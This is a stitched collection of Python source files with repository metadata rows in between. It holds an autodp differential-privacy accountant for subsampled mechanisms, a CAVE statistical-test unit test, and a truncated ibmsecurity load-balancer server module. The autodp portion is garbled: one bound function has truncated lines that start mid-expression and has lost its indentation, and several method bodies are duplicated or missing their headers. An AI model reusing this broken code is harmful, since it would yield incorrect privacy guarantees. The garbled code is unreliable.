        :param func: RDP curve of the base mechanism, func(alpha) -> epsilon.
        :param prob: Poisson sampling probability, in (0, 1].
        :param coeff: number of applications of the subsampled mechanism.
        """
        self.flag = False
        self.flag_subsample = True
        if (func, prob) in self.idxhash:
            idx = self.idxhash[(func, prob)]
            # Known pair: bump multiplicity and the integer-order RDP grid.
            self.coeffs[idx] += coeff
            self.RDPs_int += self.cache[(func, prob)] * coeff
        else:
            # Unseen pair: compute an easy-to-evaluate upper bound for it.
            cgf = lambda x: x*func(x+1)

            def subsample_func_int(x):
                # CGF of the subsampled mechanism at alpha = x (lambda = x - 1).
                if np.isinf(func(x)):
                    return np.inf
                if prob == 1.0:
                    return func(x)
                mm = int(x)
                fastbound = fast_poission_subsampled_cgf_upperbound(func, mm, prob)
                if x <= self.alphas[-1]:
                    # Exact expansion using the precomputed binomial table.
                    moments = [cgf(1) + 2*np.log(prob) + (mm-2) * np.log(1 - prob) + self.logBinomC[mm, 2]]
                    moments = moments + [cgf(j-1+1) +j*np.log(prob) + (mm-j) * np.log(1 - prob)
                                         + self.logBinomC[mm, j] for j in range(3,mm+1,1)]
                    return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)]+moments)
                elif mm <= self.m_lin_max:
                    # Stirling-approximated binomial coefficients: O(m) work.
                    moments = [cgf(1) + 2*np.log(prob) + (mm-2) * np.log(1 - prob) + utils.logcomb(mm, 2)]
                    moments = moments + [cgf(j-1+1) +j*np.log(prob) + (mm-j) * np.log(1 - prob)
                                         + utils.logcomb(mm, j) for j in range(3,mm+1,1)]
                    return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)]+moments)
                else:
                    # Beyond the linear range, fall back to the O(1) bound.
                    return fastbound

            def subsample_func(x):
                # RDP at alpha = x via linear interpolation of the integer CGF bound.
                epsinf, tmp = subsample_epsdelta(func(np.inf),0,prob)
                if np.isinf(x):
                    return epsinf
                if (x >= 1.0) and (x <= 2.0):
                    return np.minimum(epsinf, subsample_func_int(2.0) / (2.0-1))
                if np.equal(np.mod(x, 1), 0):
                    return np.minimum(epsinf, subsample_func_int(x) / (x-1) )
                xc = math.ceil(x)
                xf = math.floor(x)
                return np.minimum(
                    epsinf,
                    ((x-xf)*subsample_func_int(xc) + (1-(x-xf))*subsample_func_int(xf)) / (x-1)
                )

            # Book-keeping: register the new (mechanism, rate) pair.
            self.idxhash[(func, prob)] = self.n
            self.n += 1
            self.coeffs.append(coeff)
            self.RDPs.append(subsample_func)
            # Precompute the integer-order RDP grid (cached per pair).
            if (func,prob) in self.cache:
                results = self.cache[(func,prob)]
            else:
                results = np.zeros_like(self.RDPs_int, float)
                mm = np.max(self.alphas)
                for alpha in range(2, mm+1):
                    results[alpha-1] = subsample_func_int(alpha)
                # Trivial upper bound of RDP at alpha = 1 (the KL privacy).
                results[0] = results[1]
            self.cache[(func,prob)] = results
            self.RDPs_int += results * coeff
            # Track the pure-DP (alpha = inf) limit.
            eps, delta = subsample_epsdelta(func(np.inf), 0, prob)
            self.RDP_inf += eps * coeff
        # TODO: 1. Modularize the several Poisson sampling versions.
        # 2. Support both sampling schemes together.
| 44.658473
| 125
| 0.534312
|
import numpy as np
from scipy.optimize import minimize_scalar
import sys
sys.path.append('..')
import autodp
from autodp import utils, rdp_bank
from autodp.privacy_calibrator import subsample_epsdelta
import scipy
import math
def general_upperbound(func, mm, prob):
    """General-case upper bound for a subsampled mechanism at integer order mm.

    Used by anaRDPacct.compose_subsampled_mechanism, whose result is taken
    directly from this bound when the accountant runs with approx=True.

    :param func: RDP curve of the base mechanism, func(alpha) -> epsilon.
    :param mm: integer RDP order alpha.
    :param prob: subsampling probability, in (0, 1].
    :return: log-domain bound; np.inf when the base RDP diverges at mm,
        0 for the trivial orders mm in {0, 1}.
    """
    def cgf(x):
        # CGF expressed through the RDP curve: (x - 1) * eps(x).
        return (x - 1) * func(x)
    if np.isinf(func(mm)):
        return np.inf
    if mm == 1 or mm == 0:
        return 0
    # Truncate the series of subtracted terms at 50 (or mm - 1, if smaller).
    cur_k = np.minimum(50, mm - 1)
    # Positive contributions, each kept in log scale.
    log_term_1 = mm * np.log(1 - prob)
    log_term_2 = np.log(3) - func(mm) + mm * utils.stable_logsumexp_two(np.log(1 - prob), np.log(prob) + func(mm))
    # Subtracted contributions; [1] keeps the log-magnitude of the stable
    # difference (the sign component is discarded).
    neg_term_3 = [np.log(scipy.special.comb(mm,l)) + np.log(3) + (mm - l) * np.log(1 - prob) + l * np.log(prob) +
                  utils.stable_log_diff_exp((l - 1) * func(mm), cgf(l))[1] for l in
                  range(3, cur_k + 1)]
    neg_term_4 = np.log(mm*(mm - 1)/2) + 2 * np.log(prob) + (mm - 2) * np.log(
        1 - prob) + utils.stable_log_diff_exp(np.log(3) + func(mm), func(2))[1]
    neg_term_5 = np.log(2) + np.log(prob) + np.log(mm) + (mm - 1) * np.log(1 - prob)
    neg_term_6 = mm * np.log(1 - prob) + np.log(3) - func(mm)
    pos_term = utils.stable_logsumexp([log_term_1, log_term_2])
    neg_term_3.append(neg_term_4)
    neg_term_3.append(neg_term_5)
    neg_term_3.append(neg_term_6)
    neg_term = utils.stable_logsumexp(neg_term_3)
    # Final bound: log(exp(pos_term) - exp(neg_term)), magnitude component.
    bound = utils.stable_log_diff_exp(pos_term, neg_term)[1]
    return bound
def fast_subsampled_cgf_upperbound(func, mm, prob, deltas_local):
    """Fast CGF upper bound for a without-replacement subsampled mechanism.

    :param func: RDP curve of the base mechanism, func(alpha) -> epsilon.
    :param mm: integer RDP order alpha.
    :param prob: subsampling probability, in (0, 1].
    :param deltas_local: log-magnitude forward differences of exp(cgf),
        as produced by utils.get_forward_diffs.
    """
    # NOTE(review): this unconditional return disables everything below -- every
    # call yields +inf, and callers only use the value inside np.minimum with
    # other bounds, so the dead code is harmless.  It reads like a deliberately
    # switched-off code path; confirm against upstream history before removing.
    return np.inf
    if np.isinf(func(mm)):
        return np.inf
    if mm == 1:
        return 0
    # j = 2 term of the binomial expansion; the binomial coefficient
    # mm*(mm-1)/2 is folded in via logs at the end.
    secondterm = np.minimum(np.minimum((2) * np.log(np.exp(func(np.inf)) - 1)
                                       + np.minimum(func(2), np.log(4)),
                                       np.log(2) + func(2)),
                            np.log(4) + 0.5 * deltas_local[int(2 * np.floor(2 / 2.0)) - 1]
                            + 0.5 * deltas_local[int(2 * np.ceil(2 / 2.0)) - 1]
                            ) + 2 * np.log(prob) + np.log(mm) + np.log(mm - 1) - np.log(2)
    if mm == 2:
        return utils.stable_logsumexp([0, secondterm])
    # Log of the ratio between consecutive series terms; coeff records which of
    # the two candidate ratios is the smaller one.
    logratio1 = np.log(prob) + np.log(mm) + func(mm)
    logratio2 = logratio1 + np.log(np.exp(func(np.inf)) - 1)
    logratio = np.minimum(logratio1, logratio2)
    if logratio1 > logratio2:
        coeff = 1
    else:
        coeff = 2
    if mm == 3:
        return utils.stable_logsumexp([0, secondterm, np.log(coeff) + 3 * logratio])
    # Tail (terms j >= 3), bounded three ways; the smallest is kept below.
    # (a) geometric-series bound, split by the sign of the log-ratio:
    if logratio < 0:
        geometric_series_bound = np.log(coeff) + 3 * logratio - np.log(1 - np.exp(logratio)) \
                                 + np.log(1 - np.exp((mm - 2) * logratio))
    elif logratio > 0:
        geometric_series_bound = np.log(coeff) + 3 * logratio + (mm-2) * logratio - np.log(np.exp(logratio) - 1)
    else:
        geometric_series_bound = np.log(coeff) + np.log(mm - 2)
    # (b)/(c) binomial-series bounds with the j = 0, 1, 2 terms subtracted out
    # via signed stable summation.
    logh1 = np.log(prob) + func(mm - 1)
    logh2 = logh1 + np.log(np.exp(func(np.inf)) - 1)
    binomial_series_bound1 = np.log(2) + mm * utils.stable_logsumexp_two(0, logh1)
    binomial_series_bound2 = mm * utils.stable_logsumexp_two(0, logh2)
    tmpsign, binomial_series_bound1 \
        = utils.stable_sum_signed(True, binomial_series_bound1, False, np.log(2)
                                  + utils.stable_logsumexp([0, logh1 + np.log(mm), 2 * logh1 + np.log(mm)
                                                            + np.log(mm - 1) - np.log(2)]))
    tmpsign, binomial_series_bound2 \
        = utils.stable_sum_signed(True, binomial_series_bound2, False,
                                  utils.stable_logsumexp([0, logh2 + np.log(mm), 2 * logh2 + np.log(mm)
                                                          + np.log(mm - 1) - np.log(2)]))
    remainder = np.min([geometric_series_bound, binomial_series_bound1, binomial_series_bound2])
    return utils.stable_logsumexp([0, secondterm, remainder])
def fast_poission_subsampled_cgf_upperbound(func, mm, prob):
if np.isinf(func(mm)):
return np.inf
if mm == 1:
return 0
.log(1-prob), np.log(prob) + func(mm))
mexp([mm * np.log(1-prob), (mm-1) * np.log(1-prob) + np.log(mm) + np.log(prob),
(mm-2)*np.log(1-prob) + 2 * np.log(prob) + np.log(mm) + np.log(mm-1) + func(2),
np.log(mm) + np.log(mm-1) + np.log(mm-2) - np.log(3*2) + 3 * np.log(prob)
+ (mm-3)*np.log(1-prob) + 2 * func(mm) +
(mm-3) * utils.stable_logsumexp_two(0, np.log(prob) - np.log(1-prob) + func(mm))])
else:
bound2 = bound1
return np.minimum(bound1,bound2)
def fast_k_subsample_upperbound(func, mm, prob, k):
    """Truncated (k-term) upper bound for subsampled RDP at integer order mm.

    :param func: RDP curve of the base mechanism, func(alpha) -> epsilon.
    :param mm: integer RDP order alpha.
    :param prob: subsampling probability, in (0, 1].
    :param k: number of leading series terms to keep before switching to the
        log-domain tail correction.
    :return: log-domain bound; np.inf when the base RDP diverges at mm.
    """
    def cgf(x):
        # CGF expressed through the RDP curve: (x - 1) * eps(x).
        return (x - 1) * func(x)
    if np.isinf(func(mm)):
        return np.inf
    if mm == 1:
        return 0
    # Never keep more terms than mm - 1.
    cur_k = np.minimum(k, mm - 1)
    if (2 * cur_k) >= mm:
        # Truncation would not save work here: evaluate the full binomial
        # expansion exactly and return it.
        exact_term_1 = (mm - 1) * np.log(1 - prob) + np.log(mm * prob - prob + 1)
        exact_term_2 = [np.log(scipy.special.comb(mm,l)) + (mm - l) * np.log(1 - prob) + l * np.log(prob) + cgf(l) for l in
                        range(2, mm + 1)]
        exact_term_2.append(exact_term_1)
        bound = utils.stable_logsumexp(exact_term_2)
        return bound
    # Head of the series plus stable log-domain corrections; stable_log_diff_exp
    # returns (sign, log-magnitude) -- only the magnitude is used below.
    s, mag1 = utils.stable_log_diff_exp(0, -func(mm - cur_k))
    new_log_term_1 = np.log(1 - prob) * mm + mag1
    new_log_term_2 = -func(mm - cur_k) + mm * utils.stable_logsumexp_two(np.log(1 - prob),
                                                                         np.log(prob) + func(mm - cur_k))
    new_log_term_3 = [np.log(scipy.special.comb(mm,l)) + (mm - l) * np.log(1 - prob) + l * np.log(prob) +
                      utils.stable_log_diff_exp((l - 1) * func(mm - cur_k), cgf(l))[1] for l in
                      range(2, cur_k + 1)]
    if len(new_log_term_3) > 0:
        new_log_term_3 = utils.stable_logsumexp(new_log_term_3)
    else:
        # No middle terms (cur_k < 2): the first two terms are the whole bound.
        return utils.stable_logsumexp_two(new_log_term_1, new_log_term_2)
    new_log_term_4 = [np.log(scipy.special.comb(mm,mm-l)) + (mm - l) * np.log(1 - prob) + l * np.log(prob) +
                      utils.stable_log_diff_exp(cgf(l), (l - 1) * func(mm - cur_k))[1] for l in
                      range(mm - cur_k + 1, mm + 1)]
    new_log_term_4.append(new_log_term_1)
    new_log_term_4.append(new_log_term_2)
    new_log_term_4 = utils.stable_logsumexp(new_log_term_4)
    # Bound = log(exp(term_4 sum) - exp(term_3 sum)), magnitude component.
    s, new_log_term_5 = utils.stable_log_diff_exp(new_log_term_4, new_log_term_3)
    new_bound = new_log_term_5
    return new_bound
class anaRDPacct:
def __init__(self, m=100, tol=0.1, m_max=500, m_lin_max=10000, approx = False, verbose=False):
self.m = m
self.m_max = m_max
self.m_lin_max = m_lin_max
self.verbose = verbose
self.approx = approx
self.lambs = np.linspace(1, self.m, self.m).astype(int)
self.alphas = np.linspace(1, self.m, self.m).astype(int)
self.RDPs_int = np.zeros_like(self.alphas, float)
self.n=0
self.RDPs = []
self.coeffs = []
self.RDP_inf = .0
self.logBinomC = utils.get_binom_coeffs(self.m + 1)
self.idxhash = {}
self.cache = {}
self.deltas_cache = {}
self.evalRDP = lambda x: 0
self.flag = True
self.flag_subsample = False
self.tol = tol
def build_zeroth_oracle(self):
self.evalRDP = lambda x: sum([c * item(x) for (c, item) in zip(self.coeffs, self.RDPs)])
def plot_rdp(self):
if not self.flag:
self.build_zeroth_oracle()
self.flag = True
import matplotlib.pyplot as plt
plt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k')
x = range(0,self.m,1)
y = [self.evalRDP(item) for item in x]
plt.loglog(x, y)
plt.show()
def plot_cgf_int(self):
import matplotlib.pyplot as plt
plt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k')
plt.plot(self.alphas, self.RDPs_int)
plt.xlabel(r'$\lambda$')
plt.ylabel('CGF')
plt.show()
def plot_rdp_int(self):
import matplotlib.pyplot as plt
plt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k')
plt.loglog(self.alphas, self.RDPs_int)
if not self.flag:
self.build_zeroth_oracle()
self.flag = True
x = range(1,self.m_lin_max,1)
y = [self.evalRDP(item) for item in x]
plt.loglog(x, y)
plt.xlabel(r'$\alpha$')
plt.ylabel(r'RDP $\epsilon$')
plt.show()
def get_rdp(self,alphas):
if not self.flag:
self.build_zeroth_oracle()
self.flag = True
alphas = np.array(alphas)
assert(np.all(alphas >= 1))
rdp_list = []
for alpha in alphas:
rdp_list.append(self.evalRDP(alpha))
return np.array(rdp_list)
def get_eps(self, delta):
if not self.flag:
self.build_zeroth_oracle()
self.flag = True
if delta<0 or delta > 1:
print("Error! delta is a probability and must be between 0 and 1")
if delta == 0:
return self.RDP_inf
else:
def fun(x):
if x <= 1:
return np.inf
else:
return np.log(1 / delta)/(x-1) + self.evalRDP(x)
def fun_int(i): # the input is RDP's \alpha in integer
if i <= 1 | i >= len(self.RDPs_int):
return np.inf
else:
return np.log(1 / delta) / (i-1) + self.RDPs_int[i - 1]
while (self.m<self.m_max) and (not np.isposinf(fun(self.m))) and (fun_int(self.m-1)-fun_int(self.m-2) < 0):
if self.flag_subsample:
self.logBinomC = utils.get_binom_coeffs(self.m*2+1)
for key, val in self.deltas_cache.items():
if type(key) is tuple:
func_tmp = key[0]
else:
func_tmp = key
cgf = lambda x: x*func_tmp(x+1)
deltas,signs_deltas = utils.get_forward_diffs(cgf,self.m*2)
self.deltas_cache[key] = [deltas, signs_deltas]
new_alphas = range(self.m + 1, self.m * 2 + 1, 1)
self.alphas = np.concatenate((self.alphas, np.array(new_alphas)))
self.m = self.m * 2
mm = np.max(self.alphas)
rdp_int_new = np.zeros_like(self.alphas, float)
for key,val in self.cache.items():
idx = self.idxhash[key]
rdp = self.RDPs[idx]
newarray = np.zeros_like(self.alphas, float)
for j in range(2,mm+1,1):
newarray[j-1] = rdp(1.0*j)
newarray[0]=newarray[1]
coeff = self.coeffs[idx]
rdp_int_new += newarray * coeff
self.cache[key] = newarray
self.RDPs_int = rdp_int_new
bestint = np.argmin(np.log(1 / delta)/(self.alphas[1:]-1) + self.RDPs_int[1:]) + 1
if bestint == self.m-1:
if self.verbose:
print('Warning: Reach quadratic upper bound: m_max.')
cur = fun(bestint)
while (not np.isposinf(cur)) and fun(bestint-1)-fun(bestint-2) < -1e-8:
bestint = bestint*2
cur = fun(bestint)
if bestint > self.m_lin_max and self.approx ==True:
print('Warning: Reach linear upper bound: m_lin_max.')
return cur
results = minimize_scalar(fun, method='Bounded', bounds=[self.m-1, bestint + 2],
options={'disp': False})
if results.success:
return results.fun
else:
return None
if bestint == 0:
if self.verbose:
print('Warning: Smallest alpha = 1.')
bestalpha = self.alphas[bestint]
results = minimize_scalar(fun, method='Bounded',bounds=[bestalpha-1, bestalpha+1],
options={'disp':False})
if results.success:
return results.fun
else:
return -1
def compose_mechanism(self, func, coeff=1.0):
self.flag = False
if func in self.idxhash:
self.coeffs[self.idxhash[func]] += coeff
self.RDPs_int += self.cache[func] * coeff
else:
self.idxhash[func] = self.n
self.n += 1
self.coeffs.append(coeff)
self.RDPs.append(func)
if func in self.cache:
tmp = self.cache[func]
else:
tmp = np.zeros_like(self.RDPs_int, float)
for i in range(self.m):
tmp[i] = func(i+1)
self.cache[func] = tmp
self.RDPs_int += tmp * coeff
self.RDP_inf += func(np.inf) * coeff
def compose_subsampled_mechanism(self, func, prob, coeff=1.0):
self.flag = False
self.flag_subsample = True
if (func, prob) in self.idxhash:
idx = self.idxhash[(func, prob)]
self.coeffs[idx] += coeff
self.RDPs_int += self.cache[(func, prob)] * coeff
else:
def cgf(x):
return x * func(x+1)
deltas, signs_deltas = utils.get_forward_diffs(cgf,self.m)
self.deltas_cache[(func,prob)] = [deltas,signs_deltas]
def subsample_func_int(x):
deltas_local, signs_deltas_local = self.deltas_cache[(func,prob)]
if np.isinf(func(x)):
return np.inf
mm = int(x)
fastupperbound = fast_subsampled_cgf_upperbound(func, mm, prob, deltas_local)
fastupperbound2 = general_upperbound(func, mm, prob)
if self.approx ==True:
if fastupperbound2 <0:
print('general rdp is negative',x)
return fastupperbound2
if mm <= self.alphas[-1]:
moments = [ np.minimum(np.minimum((j)*np.log(np.exp(func(np.inf))-1) + np.minimum(cgf(j-1),np.log(4)),
np.log(2) + cgf(j-1)),
np.log(4) + 0.5*deltas_local[int(2*np.floor(j/2.0))-1]
+ 0.5*deltas_local[int(2*np.ceil(j/2.0))-1]) + j*np.log(prob)
+self.logBinomC[int(mm), j] for j in range(2,int(mm+1),1)]
return np.minimum(fastupperbound, utils.stable_logsumexp([0]+moments))
elif mm <= self.m_lin_max:
moment_bound = lambda j: np.minimum(j * np.log(np.exp(func(np.inf)) - 1)
+ np.minimum(cgf(j - 1), np.log(4)), np.log(2)
+ cgf(j - 1)) + j * np.log(prob) + utils.logcomb(mm, j)
moments = [moment_bound(j) for j in range(2,mm+1,1)]
return np.minimum(fastupperbound, utils.stable_logsumexp([0]+ moments))
else:
return fastupperbound
def subsample_func(x):
epsinf, tmp = subsample_epsdelta(func(np.inf),0,prob)
if np.isinf(x):
return epsinf
if prob == 1.0:
return func(x)
if (x >= 1.0) and (x <= 2.0):
return np.minimum(epsinf, subsample_func_int(2.0) / (2.0-1))
if np.equal(np.mod(x, 1), 0):
return np.minimum(epsinf, subsample_func_int(x) / (x-1) )
xc = math.ceil(x)
xf = math.floor(x)
return np.minimum(
epsinf,
((x-xf)*subsample_func_int(xc) + (1-(x-xf))*subsample_func_int(xf)) / (x-1)
)
self.idxhash[(func, prob)] = self.n
self.n += 1
self.coeffs.append(coeff)
self.RDPs.append(subsample_func)
if (func,prob) in self.cache:
results = self.cache[(func,prob)]
else:
results = np.zeros_like(self.RDPs_int, float)
mm = np.max(self.alphas)
for alpha in range(2, mm+1):
results[alpha-1] = subsample_func(alpha)
results[0] = results[1]
self.cache[(func,prob)] = results
self.RDPs_int += results * coeff
eps, delta = subsample_epsdelta(func(np.inf), 0, prob)
self.RDP_inf += eps * coeff
self.flag = False
self.flag_subsample = True
if (func, prob) in self.idxhash:
idx = self.idxhash[(func, prob)]
self.coeffs[idx] += coeff
self.RDPs_int += self.cache[(func, prob)] * coeff
else:
def cgf(x):
return x * func(x+1)
def subsample_func_int(x):
if np.isinf(func(x)):
return np.inf
mm = int(x)
fastbound = fast_poission_subsampled_cgf_upperbound(func, mm, prob)
k = self.alphas[-1]
fastbound_k = fast_k_subsample_upperbound(func, mm, prob,k)
if self.approx == True:
return fastbound_k
if x <= self.alphas[-1]:
moments = [cgf(j-1) +j*np.log(prob) + (mm-j) * np.log(1-prob)
+ self.logBinomC[mm, j] for j in range(2,mm+1,1)]
return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)]+moments)
elif mm <= self.m_lin_max:
moments = [cgf(j-1) +j*np.log(prob) + (mm-j) * np.log(1-prob)
+ utils.logcomb(mm,j) for j in range(2,mm+1,1)]
return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)] + moments)
else:
return fastbound
def subsample_func(x):
if np.isinf(func(x)):
return np.inf
if prob == 1.0:
return func(x)
epsinf, tmp = subsample_epsdelta(func(np.inf),0,prob)
if np.isinf(x):
return epsinf
if (x >= 1.0) and (x <= 2.0):
return np.minimum(epsinf, subsample_func_int(2.0) / (2.0-1))
if np.equal(np.mod(x, 1), 0):
return np.minimum(epsinf, subsample_func_int(x) / (x-1) )
xc = math.ceil(x)
xf = math.floor(x)
return np.minimum(
epsinf,
((x-xf)*subsample_func_int(xc) + (1-(x-xf))*subsample_func_int(xf)) / (x-1)
)
self.idxhash[(func, prob)] = self.n
self.n += 1
self.coeffs.append(coeff)
self.RDPs.append(subsample_func)
if (func,prob) in self.cache:
results = self.cache[(func,prob)]
else:
results = np.zeros_like(self.RDPs_int, float)
mm = np.max(self.alphas)
jvec = np.arange(2, mm + 1)
logterm3plus = np.zeros_like(results)
for j in jvec:
logterm3plus[j-2] = cgf(j-1) + j * np.log(prob)
for alpha in range(2, mm+1):
if np.isinf(logterm3plus[alpha-1]):
results[alpha-1] = np.inf
else:
tmp = utils.stable_logsumexp(logterm3plus[0:alpha-1] + self.logBinomC[alpha , 2:(alpha + 1)]
+ (alpha+1-jvec[0:alpha-1])*np.log(1-prob))
results[alpha-1] = utils.stable_logsumexp_two((alpha-1)*np.log(1-prob)
+ np.log(1+(alpha-1)*prob), tmp) / (1.0*alpha-1)
results[0] = results[1]
self.cache[(func,prob)] = results
self.RDPs_int += results * coeff
eps, delta = subsample_epsdelta(func(np.inf), 0, prob)
self.RDP_inf += eps * coeff
def compose_poisson_subsampled_mechanisms1(self, func, prob, coeff=1.0):
self.flag = False
self.flag_subsample = True
if (func, prob) in self.idxhash:
idx = self.idxhash[(func, prob)]
self.coeffs[idx] += coeff
self.RDPs_int += self.cache[(func, prob)] * coeff
else:
cgf = lambda x: x*func(x+1)
def subsample_func_int(x):
if np.isinf(func(x)):
return np.inf
if prob == 1.0:
return func(x)
mm = int(x)
fastbound = fast_poission_subsampled_cgf_upperbound(func, mm, prob)
if x <= self.alphas[-1]:
moments = [cgf(1) + 2*np.log(prob) + (mm-2) * np.log(1 - prob) + self.logBinomC[mm, 2]]
moments = moments + [cgf(j-1+1) +j*np.log(prob) + (mm-j) * np.log(1 - prob)
+ self.logBinomC[mm, j] for j in range(3,mm+1,1)]
return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)]+moments)
elif mm <= self.m_lin_max:
moments = [cgf(1) + 2*np.log(prob) + (mm-2) * np.log(1 - prob) + utils.logcomb(mm, 2)]
moments = moments + [cgf(j-1+1) +j*np.log(prob) + (mm-j) * np.log(1 - prob)
+ utils.logcomb(mm, j) for j in range(3,mm+1,1)]
return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)]+moments)
else:
return fastbound
def subsample_func(x):
epsinf, tmp = subsample_epsdelta(func(np.inf),0,prob)
if np.isinf(x):
return epsinf
if (x >= 1.0) and (x <= 2.0):
return np.minimum(epsinf, subsample_func_int(2.0) / (2.0-1))
if np.equal(np.mod(x, 1), 0):
return np.minimum(epsinf, subsample_func_int(x) / (x-1) )
xc = math.ceil(x)
xf = math.floor(x)
return np.minimum(
epsinf,
((x-xf)*subsample_func_int(xc) + (1-(x-xf))*subsample_func_int(xf)) / (x-1)
)
self.idxhash[(func, prob)] = self.n
self.n += 1
self.coeffs.append(coeff)
self.RDPs.append(subsample_func)
if (func,prob) in self.cache:
results = self.cache[(func,prob)]
else:
results = np.zeros_like(self.RDPs_int, float)
mm = np.max(self.alphas)
for alpha in range(2, mm+1):
results[alpha-1] = subsample_func_int(alpha)
results[0] = results[1]
self.cache[(func,prob)] = results
self.RDPs_int += results * coeff
eps, delta = subsample_epsdelta(func(np.inf), 0, prob)
self.RDP_inf += eps * coeff
| true
| true
|
f705c04fa8bb30cc2be892362cc4af89d3328301
| 1,297
|
py
|
Python
|
test/test_utils/test_statistical_tests.py
|
deslay1/CAVE
|
e4b9abc3812034f49dddd27ffc17dbab39782a1c
|
[
"BSD-3-Clause"
] | 45
|
2018-01-11T11:26:11.000Z
|
2021-06-22T06:14:39.000Z
|
test/test_utils/test_statistical_tests.py
|
deslay1/CAVE
|
e4b9abc3812034f49dddd27ffc17dbab39782a1c
|
[
"BSD-3-Clause"
] | 150
|
2017-12-20T16:14:45.000Z
|
2021-09-28T11:26:33.000Z
|
test/test_utils/test_statistical_tests.py
|
automl/SpySMAC
|
afcbecd0b9cb97276625c16a89cb6df141e6f6f2
|
[
"BSD-3-Clause"
] | 17
|
2018-03-17T04:46:09.000Z
|
2021-02-18T18:31:38.000Z
|
import logging
import unittest
import numpy as np
from cave.utils.statistical_tests import paired_permutation, paired_t_student
class TestStatisticalTests(unittest.TestCase):
    """Sanity checks for the paired permutation and paired t-test helpers."""

    def setUp(self):
        self.logger = logging.getLogger("TestStatisticalTests")

    def test_paired_permutation(self):
        """Paired permutation test on identical, similar and separated samples."""
        rng = np.random.RandomState(42)
        sample_x = rng.normal(loc=0, size=100)
        sample_y = rng.normal(loc=0, size=100)
        # A sample compared with itself must look maximally similar.
        p_value = paired_permutation(sample_x, sample_x, rng, 100, self.logger)
        self.assertGreater(p_value, 0.9999)
        # Two draws from the same distribution should not be separable.
        p_value = paired_permutation(sample_x, sample_y, rng, 100, self.logger)
        self.assertGreater(p_value, 0.3)
        # Clearly shifted distributions must be flagged as different.
        sample_x = rng.normal(loc=-1, size=100)
        sample_y = rng.normal(loc=1, size=100)
        p_value = paired_permutation(sample_x, sample_y, rng, 1000, self.logger)
        self.assertLess(p_value, 0.001)

    def test_t_student(self):
        """Paired t-test on similar vs. clearly separated samples."""
        rng = np.random.RandomState(42)
        sample_x = rng.normal(loc=0, size=100)
        sample_y = rng.normal(loc=0, size=100)
        p_value = paired_t_student(sample_x, sample_y, self.logger)
        self.assertGreater(p_value, 0.3)
        sample_x = rng.normal(loc=-1, size=100)
        sample_y = rng.normal(loc=1, size=100)
        p_value = paired_t_student(sample_x, sample_y, self.logger)
        self.assertLess(p_value, 0.001)
| 37.057143
| 77
| 0.651503
|
import logging
import unittest
import numpy as np
from cave.utils.statistical_tests import paired_permutation, paired_t_student
class TestStatisticalTests(unittest.TestCase):
    """Unit tests for the statistical-test helpers in cave.utils.statistical_tests."""
    def setUp(self):
        # Shared, named logger that the helpers under test can log through.
        self.logger = logging.getLogger("TestStatisticalTests")
    def test_paired_permutation(self):
        """Testing the paired permutation test."""
        rng = np.random.RandomState(42)
        a, b = rng.normal(loc=0, size=100), rng.normal(loc=0, size=100)
        # Identical samples: p-value must be (near) 1.
        result = paired_permutation(a, a, rng, 100, self.logger)
        self.assertGreater(result, 0.9999)
        # Same-distribution samples: not significant.
        result = paired_permutation(a, b, rng, 100, self.logger)
        self.assertGreater(result, 0.3)
        # Clearly shifted distributions: highly significant.
        a, b = rng.normal(loc=-1, size=100), rng.normal(loc=1, size=100)
        result = paired_permutation(a, b, rng, 1000, self.logger)
        self.assertLess(result, 0.001)
    def test_t_student(self):
        """Testing the paired t-test."""
        rng = np.random.RandomState(42)
        a, b = rng.normal(loc=0, size=100), rng.normal(loc=0, size=100)
        # Same-distribution samples: not significant.
        result = paired_t_student(a, b, self.logger)
        self.assertGreater(result, 0.3)
        # Clearly shifted distributions: highly significant.
        a, b = rng.normal(loc=-1, size=100), rng.normal(loc=1, size=100)
        result = paired_t_student(a, b, self.logger)
        self.assertLess(result, 0.001)
| true
| true
|
f705c09c479088d7f96725e5df722801a0715965
| 5,653
|
py
|
Python
|
ibmsecurity/isam/base/network/felb/services/servers.py
|
ibm-enio/ibmsecurity
|
81f989678642c3b6a49b2a3fbb5d9ca98804ef17
|
[
"Apache-2.0"
] | 2
|
2019-12-05T13:51:10.000Z
|
2019-12-20T08:02:35.000Z
|
ibmsecurity/isam/base/network/felb/services/servers.py
|
ibm-enio/ibmsecurity
|
81f989678642c3b6a49b2a3fbb5d9ca98804ef17
|
[
"Apache-2.0"
] | null | null | null |
ibmsecurity/isam/base/network/felb/services/servers.py
|
ibm-enio/ibmsecurity
|
81f989678642c3b6a49b2a3fbb5d9ca98804ef17
|
[
"Apache-2.0"
] | 1
|
2020-04-03T09:30:01.000Z
|
2020-04-03T09:30:01.000Z
|
import ibmsecurity.utilities.tools
import logging
logger = logging.getLogger(__name__)
module_uri = "/isam/felb/configuration/services/"
requires_modulers = None
requires_version = None
def add(isamAppliance, service_name, address, active, port, weight, secure, ssllabel, check_mode=False, force=False):
"""
Creating a server
"""
change_required = _check_exist(isamAppliance, service_name, address, port=port)
if force is True or change_required is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
return isamAppliance.invoke_post("Creating a server",
"{0}{1}/servers".format(module_uri, service_name, address),
{
"active": active,
"address": address,
"port": port,
"weight": weight,
"secure": secure,
"ssllabel": ssllabel
},
requires_version=requires_version, requires_modules=requires_modulers)
else:
return isamAppliance.create_return_object()
def delete(isamAppliance, service_name, address, check_mode=False, force=False):
"""
deletes a server from specified service name
"""
if force is True or _check_exist(isamAppliance, service_name, address) is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
return isamAppliance.invoke_delete("Deleting a server",
"{0}{1}/servers/{2}".format(module_uri, service_name, address),
requires_version=requires_version, requires_modules=requires_modulers)
else:
return isamAppliance.create_return_object()
def get(isamAppliance, service_name, address, check_mode=False, force=False):
"""
Retrieves server from specified service name
"""
return (
isamAppliance.invoke_get("Retrieving a server", "{0}{1}/servers/{2}".format(module_uri, service_name, address),
